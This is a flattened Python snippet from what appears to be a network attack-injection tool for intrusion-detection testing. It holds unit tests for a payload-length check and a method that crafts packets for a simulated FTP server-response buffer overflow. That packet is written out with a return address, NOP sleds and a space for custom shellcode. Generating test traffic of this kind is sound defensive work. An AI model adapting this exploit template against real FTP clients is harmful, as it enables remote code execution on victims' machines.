def test_check_payload_len_exceeded(self): with self.assertRaises(ValueError): Utility.check_payload_len(10, 5)
def test_check_payload_len_valid(self): Utility.check_payload_len(5, 10)
def generate_attack_packets(self): """ Creates the attack packets. """ pps = self.get_param_value(self.PACKETS_PER_SECOND) # Store start timestamp of attack self.attack_start_utime = self.get_param_value( self.INJECT_AT_TIMESTAMP) # Initialize parameters ip_victim = self.get_param_value(self.IP_SOURCE) ip_attacker = self.get_param_value(self.IP_DESTINATION) mac_victim = self.get_param_value(self.MAC_SOURCE) mac_attacker = self.get_param_value(self.MAC_DESTINATION) custom_payload = self.get_param_value(self.CUSTOM_PAYLOAD) custom_payload_len = 0 if custom_payload is not None: custom_payload_len = len(custom_payload) custom_payload_limit = 1000 # TODO: check this for param | introduced string_limited !!!! Util.check_payload_len(custom_payload_len, custom_payload_limit) # Create random victim if specified if self.get_param_value(self.IP_SOURCE_RANDOMIZE): # The most used IP class in background traffic most_used_ip_class = Util.handle_most_used_outputs( self.statistics.get_most_used_ip_class()) ip_victim = self.generate_random_ipv4_address( most_used_ip_class, 1) mac_victim = self.generate_random_mac_address() # Get MSS, TTL and Window size value for victim/attacker IP victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data( ip_victim) attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data( ip_attacker) min_latency, max_latency = self.get_reply_latency( ip_victim, ip_attacker) attacker_seq = rnd.randint(1000, 50000) victim_seq = rnd.randint(1000, 50000) sport = Util.generate_source_port_from_platform("win7") # connection request from victim (client) #print(mac_victim, mac_attacker) victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker) #print(ip_victim, ip_attacker, victim_ttl_value) victim_ip = inet.IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF') #print(sport, ftp_port, victim_win_value, victim_seq, victim_mss_value) request_tcp = inet.TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S', seq=victim_seq, options=[('MSS', victim_mss_value)]) victim_seq += 1 syn = (victim_ether / victim_ip / request_tcp) syn.time = self.attack_start_utime #print(self.attack_start_utime) self.add_packet(syn, ip_victim, ip_attacker) # response from attacker (server) attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim) attacker_ip = inet.IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF') reply_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA', window=attacker_win_value, options=[('MSS', attacker_mss_value)]) attacker_seq += 1 synack = (attacker_ether / attacker_ip / reply_tcp) synack.time = self.timestamp_controller.next_timestamp(min_latency) self.add_packet(synack, ip_victim, ip_attacker) # acknowledgement from victim (client) ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A', window=victim_win_value, options=[('MSS', victim_mss_value)]) ack = (victim_ether / victim_ip / ack_tcp) ack.time = self.timestamp_controller.next_timestamp(min_latency) self.add_packet(ack, ip_victim, ip_attacker) # FTP exploit packet ftp_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA', window=attacker_win_value, options=[('MSS', attacker_mss_value)]) characters = b'220' characters += Util.get_rnd_bytes(2065, Util.forbidden_chars) characters += b'\x96\x72\x01\x68' characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars) custom_payload_file = self.get_param_value(self.CUSTOM_PAYLOAD_FILE) # Generation of payload of the FTP exploit packet if custom_payload == "": if custom_payload_file == "": payload = Util.get_rnd_bytes(custom_payload_limit, Util.forbidden_chars) else: payload = Lib.Utility.get_bytes_from_file(custom_payload_file) Util.check_payload_len(len(payload), custom_payload_limit) payload += Util.get_rnd_x86_nop( custom_payload_limit - len(payload), False, Util.forbidden_chars) else: encoded_payload = custom_payload.encode() payload = Util.get_rnd_x86_nop( custom_payload_limit - custom_payload_len, False, Util.forbidden_chars) payload += encoded_payload characters += payload characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars) characters += b'\r\n' ftp_tcp.add_payload(characters) ftp_buff = (attacker_ether / attacker_ip / ftp_tcp) ftp_buff.time = self.timestamp_controller.next_timestamp() self.add_packet(ftp_buff, ip_victim, ip_attacker) attacker_seq += len(ftp_tcp.payload) # Fin Ack from attacker fin_ack_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA', window=attacker_win_value, options=[('MSS', attacker_mss_value)]) fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp) fin_ack.time = self.timestamp_controller.next_timestamp() self.add_packet(fin_ack, ip_victim, ip_attacker) # Ack from victim on FTP packet ftp_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A', window=victim_win_value, options=[('MSS', victim_mss_value)]) ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp) ftp_ack.time = self.timestamp_controller.next_timestamp(min_latency) self.add_packet(ftp_ack, ip_victim, ip_attacker) # Ack from victim on Fin/Ack of attacker fin_ack_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq + 1, flags='A', window=victim_win_value, options=[('MSS', victim_mss_value)]) fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp) fin_ack_ack.time = self.timestamp_controller.next_timestamp() self.add_packet(fin_ack_ack, ip_victim, ip_attacker)